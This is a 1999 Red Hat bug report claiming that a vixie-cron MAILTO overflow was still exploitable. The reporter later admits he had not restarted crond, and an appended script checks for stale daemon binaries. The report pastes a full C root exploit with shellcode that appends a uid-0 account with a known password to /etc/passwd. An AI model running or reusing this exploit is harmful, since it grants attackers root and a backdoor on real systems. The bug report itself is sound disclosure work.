Bug 5819 - vixie cron exploit still works !
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: vixie-cron
Version: 6.0
Platform: All Linux
Priority: high
Severity: medium
Assigned To: Crutcher Dunnavant
URL: http://www.life.be
Keywords: Security

Reported: 1999-10-11 01:43 EDT by shivan
Modified: 2008-05-01 11:37 EDT

Last Closed: 2001-04-10 18:05:26 EDT
Description shivan 1999-10-11 01:43:13 EDT
'lo ..

I tried the vixie cron exploit which came out on 08/25/1999,
and it still works.

Normally this exploit should have been fixed with
vixie-cron-3.0.1-37; I installed up to 3.0.1-39, and the
buffer overflow still works. I tried this on several
machines (all RH 6.0) with different kernels. (This also
works on alpha.)

Please inform me ASAP about the progress on this bug
(original exploit pasted below).

Kind Regards,
Dimitri Avgoustakis
UNIX Administrator ..
LIFE - The Linux Company

Exploit located on bugtraq:
"http://www.securityfocus.com/data/vulnerabilities/exploits/crontab_exploit.c"

/*
        vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99
                        Akke <c4c4@hehe.com>


        how to compile ?
                gcc crontab_exploit.c -o crontab_exploit

        how to use ?
                ./crontab_exploit
                crontab ./CrOn
                wait 1 minute
                crontab -r
                su -l cronexpl (password = exploited) (this is root account)

        Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Linux/x86 execve() shellcode; the path it executes is /tmp/ce. */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
        char crontab_file_string[max_buf_len];
        char temp[max_buf_len];
        FILE *fp;
        int i;

        /* Padding followed by the shellcode: this becomes the oversized
           MAILTO value that triggers the overflow in cron_popen(). */
        strcpy(temp,
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
        "_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
        strcat(temp, shellcode);
        sprintf(crontab_file_string,"MAILTO=%s\n",temp);
        /* Minute field 0,1,...,59: the job runs every minute, so the
           mail step (and with it the overflow) fires within a minute. */
        strcat(crontab_file_string,"0");
        for (i=1;i<60;i++)
                sprintf(crontab_file_string+strlen(crontab_file_string),",%d",i);
        sprintf(temp," * * * * %s\n",CronEchoScript);
        strcat(crontab_file_string,temp);

        /* The crontab to install with "crontab ./CrOn". */
        if ((fp = fopen(CronFile,"w+")) != NULL) {
                fprintf(fp,"%s",crontab_file_string);
                fclose(fp);
        }

        /* The job only has to produce output, so that crond tries to
           mail it and uses the overlong MAILTO value. */
        if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\necho Wrong window!");
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript);
                system(temp);
        }

        /* Payload run as root: add a uid 0 account, then remove the
           helper files. */
        if ((fp = fopen(RootScript,"w+")) != NULL) {
                #define login "cronexpl"
                #define passw "1T8uqGnJZ0OsQ" /* "exploited" */
                fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",
                        login,passw,CronEchoScript,"/tmp/ce",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,RootScript);
                system(temp);
        }

        /* /tmp/ce is what the shellcode execve()s; it just runs RootScript. */
        if ((fp = fopen("/tmp/ce","w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce");
                system(temp);
        }
        exit(0);
}
Comment 1 shivan 1999-10-11 02:24:59 EDT
RHSA-1999:030-01: vixie-cron crond MAILTO
Comment 2 shivan 1999-10-11 03:10:59 EDT
Dear Red Hat,

I'm pleased to tell you I'm stupid ..
I forgot to stop/start crond after upgrading ..

My apologies ;)

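The failure mode behind Comment 2, a daemon that keeps executing the pre-upgrade binary because nobody restarted it, can be checked directly rather than trusting the package version. The script below is an added example, not part of the bug report and not vixie-cron code. It assumes a Linux /proc: when a package upgrade replaces a file, the old inode is unlinked, and the kernel then reports the running process's /proc/PID/exe link with a " (deleted)" suffix. The function names and the daemon name "crond" are this example's own choices.

```shell
#!/bin/sh
# Added example: find processes still running a binary that has been
# replaced on disk since they started (e.g. crond after "rpm -U vixie-cron"
# without a restart). Linux-only: relies on /proc/PID/exe and /proc/PID/comm.

# Pure string check on a readlink(/proc/PID/exe) result so the logic can be
# exercised without a live process. Returns 0 = stale, 1 = current.
exe_is_stale() {
    case "$1" in
        *" (deleted)") return 0 ;;
        *)             return 1 ;;
    esac
}

# Print "PID exe-target" for every process whose executable was unlinked
# after it started. Processes we may not inspect are skipped silently.
list_stale_processes() {
    for p in /proc/[0-9]*; do
        target=$(readlink "$p/exe" 2>/dev/null) || continue
        if exe_is_stale "$target"; then
            printf '%s %s\n' "${p#/proc/}" "$target"
        fi
    done
}

# Exit 0 if any running process whose comm (first 15 chars of the program
# name, as /proc reports it) equals $1 is stale, 1 otherwise.
# Example: daemon_needs_restart crond
daemon_needs_restart() {
    for p in /proc/[0-9]*; do
        [ "$(cat "$p/comm" 2>/dev/null)" = "$1" ] || continue
        target=$(readlink "$p/exe" 2>/dev/null) || continue
        if exe_is_stale "$target"; then
            return 0
        fi
    done
    return 1
}

# Usage: sh stale-exe.sh          list every stale process
#        sh stale-exe.sh crond    exit status 0 when crond must be restarted
if [ "$#" -gt 0 ]; then
    daemon_needs_restart "$1"
else
    list_stale_processes
fi
```

To see it flag something on a test box, copy /bin/sleep to a scratch path, start that copy in the background, delete the copy, and run the script: the sleeping process is listed with its path followed by " (deleted)". After an upgrade of vixie-cron, `sh stale-exe.sh crond` returning 0 means the fix on disk is not the code that is running, which is exactly the state the reporter was testing against.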